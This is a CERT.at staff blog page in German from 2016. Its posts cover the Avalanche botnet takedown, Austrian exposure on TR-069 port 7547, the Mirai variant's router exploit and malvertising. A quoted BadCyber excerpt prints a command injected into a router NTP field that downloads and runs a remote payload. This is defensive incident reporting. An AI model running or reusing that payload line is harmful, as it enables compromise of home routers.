Deutsch | English
Dieser Blog enthält keine offiziellen Aussagen von CERT.at, sondern persönliche Meinungen einzelner Mitarbeiter.
Avalanche Takedown
1. Dezember 2016

Am 30. November 2016 wurde durch eine breit angelegte Kooperation von Polizei (Europol, Eurojust, FBI, ...), Staatsanwälten und IT Sicherheitsorganisationen (BSI, Shadowserver, CERTs) das Avalanche Botnet übernommen.

Die Zahlen von Shadowserver sind eindrucksvoll:

Jurisdictions: 30
Arrests: 5
Premises searched: 37
Servers seized: 39
Servers taken offline through abuse reports: 221
Countries with victim IP's: 180+
Domains blocked or delegated to Shadowserver's sinkholes: Over 800,000 in 60+ TLDs

CERT.at war nur am Rande involviert, wir werden aber - wie immer in diesen Fällen - die über die Sinkholes gewonnen Daten über Infektionen an die Netzbetreiber weitergeben.

Update (1. Dez. 18:30): Inzwischen haben wir den ersten Datensatz erhalten, danach sind in Österreich 711 IP-Adressen betroffen. Diese verteilen sich so auf die einzelne Schädlinge:

2016-12-01-avalanche

Autor: Otmar Lendl

Port 7547 in Österreich
30. November 2016

[Update am 1.12.2016]

In der Zeit seit meinem letzten Blogpost zu Mirai/TR-069 sind ein paar neue Informationen dazugekommen:

  • Jemand hat den Mirai Botnet Code so angepasst, dass Mirai auch eine Schwachstelle in der Implementation der Fernwartungsprotokolle TR-064 und TR-069 von diversen DSL/Kabel-Modems ausnutzen kann, um sich weiterzuverbreiten.
  • In Deutschland hat es viele Telekom-Kunden erwischt: inzwischen ist aber klar, dass die betroffenen CPEs gar nicht Mirai-infiziert waren, sondern dass diese das Scannen auf Port 7547 nicht ausgehalten haben und es so zu den Ausfällen gekommen ist.
  • International wurden uns durchaus schon Infektionswellen gemeldet. Dabei dürften Zyxel AMG1202, AMG1302 und P-660H beteiligt sein. Welche Firmware-Versionen relevant sind, wissen wir nicht.
  • Neben Port 7547 wird auch der Port 5555 gescannt. Manche Geräte/ISPs verwenden diesen Port für TR-069.
  • Wir stehen im Kontakt mit den österreichischen ISPs. Nach unseren vorläufigen Erkenntnissen gibt es keine Masseninfektionen durch diese Schadsoftware in Österreich.
  • Es gibt Berichte, dass auch aus Österreich Scan-Aktivitäten in Richtung Port 7547 beobachtet werden. Das kann gut Mirai sein, die Infektion muss aber nicht notwendigerweise auch über genau diesen Exploit passiert sein.

Shodan testet schon länger das ganze Internet auf erreichbare Dienste, u.A. auch TR-069 auf Port 7547. Uns wurde das Ergebnis einer Abfrage bei Shodan für "Österreich und Port 7547" zugespielt (danke!). Hier ist eine Zusammenfassung der Erkenntnisse:

In Summe meldet Shodan aktuell 52.314 IP-Adressen in AT, die auf Port 7547 auf Webanfragen antworten. Das dürfte fast alles TR-069 sein. Shodan testet nicht alles an einem Tag durch, sondern benötigt Wochen für seine Scans. Es kann daher sein, dass die dynamische Vergabe von IP-Adressen dieses Ergebnis verzerrt.

Wichtig ist weiters hier anzumerken, dass Shodan erreichbare Server meldet, aber nicht zwischen verwundbaren bzw. sicheren unterscheidet.

Wie verteilen sich die IP-Adressen auf ISPs? Rund 48.000 (also rund 92%) sind bei einem ISP, ein weiterer hat rund 3.300 (6%), der nächste hat schon nur noch 150 erreichbare TR-069 IP-Adressen. In Summe werden IP-Adressen aus 52 Autonomen Systemen (ISPs) gemeldet.

Diese Zahlen sind zu klein, als dass alle Kunden eines der ISPs betroffen sein könnten. Andererseits sind sie zu hoch, als dass man sie durch vom Kunden selbst gekaufte Modems erklären könnte. Ich gehen also davon aus, dass manche Chargen von CPEs, die in den letzten 15 Jahren an die Kunden verschickt wurden, den Management-Port nach außen offen haben. Ob diese providerseitig mit neuer Firmware/Konfiguration ausgestattet werden können, ist leider fraglich. Gerade dafür würde man ja TR-069 im Management-Netz brauchen.

Welche Modems sind denn das?

In den Shodan-Daten sind die HTTP-Header enthalten. Dort gibt es zwei Felder, die Aufschluss über das Gerät geben können (aber nicht müssen). Manche TR-069 Implementationen schicken einen "Server:" Header mit. Das ist bei 511 IP-Adressen der Fall gewesen. Mehr als ein mal sehen wir:

2016-11-30-tr069-server

Andere TR-069 Implementationen schicken im Authentication-Realm die Information mit, was sie für ein Gerät sind. Hier liefern rund 19.000 IP-Adressen keine sinnvolle Information, die anderen ergeben folgendes Bild:

2016-11-30-tr069-realm

Das sind also fast ausschließlich Thomson CPEs.

Weitere Links:

Autor: Otmar Lendl

Mirai goes TR-069
28. November 2016

Zu Mirai hab ich hier schon viel geschrieben. Bis jetzt hat sich dieses Botnet rein über das Erraten von Passwörtern auf Telnet-Interfaces weiterverbreitet.

Das hat sich jetzt geändert:

Am 7. November hat jemand einen Proof-of-concept exploit für ein CPE (Customer premise equipment -- also DSL-Modem, Kabelmodem & co) veröffentlicht, der zeigt, wie man per TR-069 dem Gerät Schadsoftware unterschieben kann.

(TR-069 ist ein Protokoll zum Remote-Management von solchen Geräten: damit kann ein ISP seine Leihgeräte beim Kunden aktualisieren und konfigurieren. Dass die Qualität der Implementation dieses Protokolls nicht immer optimal ist, zeigt etwa ein Vortrag vom 31C3 von 2014. Slides vom Vortrag bei der hacklu 2014 sind auch verfügbar.)

Dieser Exploit wurde anscheinend in eine Variante des Mirai Botnets eingebaut. Zu spüren war das einerseits an der steigenden Frequenz von Scans auf TCP Port 7547, als auch durch das Fehlverhalten der Modems im Netz der deutschen Telekom.

Wie sehr Österreich betroffen ist, wissen wir noch nicht. Am 31C3 hatte ich nachgefragt, da war Österreich bei TR-069 nicht sehr präsent. Die großen ISPs scheinen ihr Netz so gebaut zu haben, dass sie TR-069 nicht über das offene Internet, sonder über getrennte Kanäle zu ihren CPEs betreiben.

Links dazu:

SANS ISC

For the last couple days, attack against port 7547 have increased substantially. These scans appear to exploit a vulnerability in popular DSL routers. This issue may already have caused severe issues for German ISP Deutsche Telekom and may affect others as well (given that the US is just "waking up" from a long weekend). For Deutsche Telekom, Speedport routers appeared to be the main issue.

According to Shodan, about 41 Million devices have port 7547 open. The code appears to be derived from Mirai with the additional scan for the SOAP vulnerability. Currently, honeypots see about one request every 5-10 minutes for each target IP.

BadCyber

New Mirai attack vector - bot exploits a recently discovered router vulnerability

...

On a lazy Sunday morning we got a message from one of our Polish readers about a strange behavior of his home router. The router rebooted every 15 to 20 minutes. The reader looked at the config and realized that his router got a new, suspicious entry in the NTP server name field, namely:

cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2

It's quite obvious that there must be a RCE in the NTP server name field, but how did the above mentioned string get there? We need to take a step back, because there is one more vulnerability to be described before we move further.

Exploit-DB

# Exploit Title: Eir D1000 Wireless Router - WAN Side Remote Command Injection
# Date: 7th November 2016
# Exploit Author: Kenzo
# Website: https://devicereversing.wordpress.com
# Tested on Firmware version: 2.00(AADU.5)_20150909
# Type: Webapps
# Platform: Hardware

Autor: Otmar Lendl

Malvertising
28. Oktober 2016

Unsere Kollegen vom niederländischen NCSC haben eben ihr "Cyber Security Assessment Netherlands 2016" auch auf Englisch veröffentlicht. Da steckt viel Arbeit dahinter und dieses Dokument ist auch in weiten Bereichen für Österreich gültig. Ich will hier einen Bereich herauspicken: Malvertising.

Es geht dabei darum, dass Systeme, die zum Einblenden von Werbung in Webseiten gebaut wurden, missbraucht werden, um Exploit Packs einzubauen. Über diesen Hebel kann ein Einbruch in ein System zu einer Verseuchung von Hunderten Webseiten führen. Das ist aktuell ein ernstes Problem. Ein "Key Finding" des CSAM2016 ist:

Advertising networks have not yet shown the ability to cope with malvertising

The distribution of malware via ads on major websites is a problem. Advertising networks have not yet been able to find solutions to this problem. The wide range of advertising networks provides, along with the large number of systems from which the latest updates are missing, a large attack surface. Operators of these websites and advertising networks themselves do not have full control over the ads. This makes it possible for malware to be spread. The complete ad blocking in the browser affects the business model of website owners. To protect users against malvertising without blocking all ads, fundamental changes are needed in the way these networks work.

Wie kann man sich dagegen wehren? Neben den üblichen Tipps wie "unnötige Plugins aus dem Browser nehmen", "Click-to-Play für den Rest" und "eigenes System aktuell halten" sind auch Adblocker ein valide Sicherheitsmaßnahme. Da uns zugetragen wurde, dass aus der Medienbranche der Wunsch nach einem Verbot von Adblockern aufkommt, haben wir uns entschlossen, gemeinsam mit dem AKVorrat eine entsprechende Stellungnahme abzugeben.

Ein Geschäftsmodell, das die Sicherheit seiner Kunden ignoriert, sollte vom Gesetzgeber keinen Schutz erwarten können.

Autor: Otmar Lendl

Nächste >>
Email: reports@cert.at
Tel.: +43 1 5056416 78
mehr ...
Update: Kritische Sicherheitslücke in Mozilla Firefox - aktiv ausgenützt - Patch jetzt verfügbar
30. November 2016 | ...
Kritische Sicherheitslücke in Adobe Flash Player - aktiv ausgenützt - Patches verfügbar
27. Oktober 2016 | Beschreibung Adobe ...
mehr ...
Avalanche Takedown
1. Dezember 2016 | Am ...
Port 7547 in Österreich
30. November 2016 | ...
mehr ...
Jahresbericht 2015
Ein Resumee zur digitalen Sicherheitslage in Österreich

(HTML, PDF).
Letzte Änderung: 2016/12/1 - 18:37:43
Haftungsausschluss